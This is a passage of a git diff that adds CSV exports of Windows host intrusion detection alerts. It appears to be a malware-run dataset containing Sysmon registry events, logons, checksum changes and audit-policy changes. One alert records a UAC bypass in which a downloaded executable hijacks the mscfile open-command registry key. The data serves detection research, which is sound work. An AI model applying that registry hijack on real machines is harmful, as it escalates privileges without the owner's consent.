service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.619751800Z"",""eventRecordID"":""582"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.183",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.602079700Z"",""eventRecordID"":""581"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 12:33:19.168",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.601579500Z"",""eventRecordID"":""580"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.161",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.580724900Z"",""eventRecordID"":""579"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 12:33:19.142",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.580325500Z"",""eventRecordID"":""578"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.091",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.567794300Z"",""eventRecordID"":""576"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 12:33:19.076",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.567434400Z"",""eventRecordID"":""575"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.554\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.554"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.554 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:18.099",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:33:16.293",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37A9A + Linked Logon ID: 0x37A24 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:16.262",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37A24 + Linked Logon ID: 0x37A9A + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:14.653",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 12:33:14.166",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. 
+ +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:11.442",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 12:32:37.857",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"Apr 24, 2020 @ 12:32:37.842",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. 
+Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"Apr 24, 2020 @ 12:32:34.527",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:32:34.510",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:31:56.098",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). 
+ +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:31:49.079",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:30:24.846",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '1930b7b98646b0623c4d71c29ee5577a' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : '734e001445fab8494836c3ebbc7b6ed4be5733d7' +", +"Apr 24, 2020 @ 12:30:24.831",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. 
+Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '08af0e89b70fc23b04544d71af2b61c5' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'cc74990798ae65506078b5b0d1f8cd9895cac982' +", +"Apr 24, 2020 @ 12:29:32.915",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1469566 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.105.208.173:123) is working properly.""" +"Apr 24, 2020 @ 12:29:28.337",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '775174ea9bf25c40ba381ca284d7511d' +New md5sum is : '6a4fdf3a9f7dc36fc03599f720d484d3' +Old sha1sum was: 'eab80f5279cedff3dd227a62f8828aa899a27475' +New sha1sum is : '9f469b80d1166a11ab0299760c6cb444ef555670' +", +"Apr 24, 2020 @ 12:29:27.134",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '98a752dd618ea8df177c9595a9802822' +New md5sum is : '7b9a258df5c6f99956d6f9b3e3d7ae65' +Old sha1sum was: 'a29c098299c75cf2c48bab76549b29b6987fee6c' +New sha1sum is : 'f43e91a27dea3b358a46525fb4a5655eb79a3977' +", +"Apr 24, 2020 @ 12:29:27.117",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. 
+Old md5sum was: '8776cf6928f2de374d1a329d7b0948c3'
+New md5sum is : 'f2d628e8126f35291c90bff7ffc31c08'
+Old sha1sum was: '520ae6cd4e088c14c27c500ba09b18024715ec29'
+New sha1sum is : '34b84884b9283368a58ac1de788d118fbab8ff2a'
+",
+"Apr 24, 2020 @ 12:28:10.045",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start."""
diff --git a/data/MW_2_HIDS_3.csv b/data/MW_2_HIDS_3.csv
new file mode 100644
index 0000000..0e4da1b
--- /dev/null
+++ b/data/MW_2_HIDS_3.csv
@@ -0,0 +1,74 @@
+timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine"
+"May 22, 2020 @ 16:11:50.652",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0'
+New md5sum is : '8bd1d574020364cb73c94def0fb5afce'
+Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9'
+New sha1sum is : '1ae6bc9b8cc2b6e85d7130b80fbc843b783b1f11'
+",
+"May 22, 2020 @ 16:11:50.636",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '89598d32459256342f73e9b832b618dc'
+New md5sum is : '92eeaba3a494969a7bbeaf8cd573d02f'
+Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643'
+New sha1sum is : 'd8d3ae51554b01731209ca4829f6aa7188d111a3'
+",
+"May 22, 2020 @ 16:10:23.610",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,
+"May 22, 2020 @ 16:10:15.446",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,
+"May 22, 2020 @ 16:06:11.420",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed.
+Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d'
+New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f'
+Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2'
+New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792'
+",
+"May 22, 2020 @ 16:04:54.485",8,"Windows Audit Policy changed","""System audit policy was changed. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 16:04:54.407",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 16:04:45.812",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '05688d3fb01c8753b031688cb1be8a9a' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: '07d2e2efcc0eef4f0950f87eb46ce7cb7d621014' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +", +"May 22, 2020 @ 16:04:45.797",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'b9b17232ab989d43145b713d83b31e56' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: '59a9b4d3dd2bb5573d31e1aff08c6d38bf7d7d43' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +", +"May 22, 2020 @ 16:04:41.048",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. 
+Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 22, 2020 @ 16:04:12.583",15,"ATT&CK T1088: UAC Bypass via Event Viewer","""Registry value set: +RuleName: T1042 +EventType: SetValue +UtcTime: 2020-05-22 13:18:16.616 +ProcessGuid: {df9fc3d3-d118-5ec7-0000-00109ec01100} +ProcessId: 6988 +Image: C:\Users\John Williams\Downloads\program2.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001_Classes\mscfile\shell\open\command\(Default) +Details: C:\Users\John Williams\Downloads\program2.exe""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:16.631941300Z"",""eventRecordID"":""907"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry 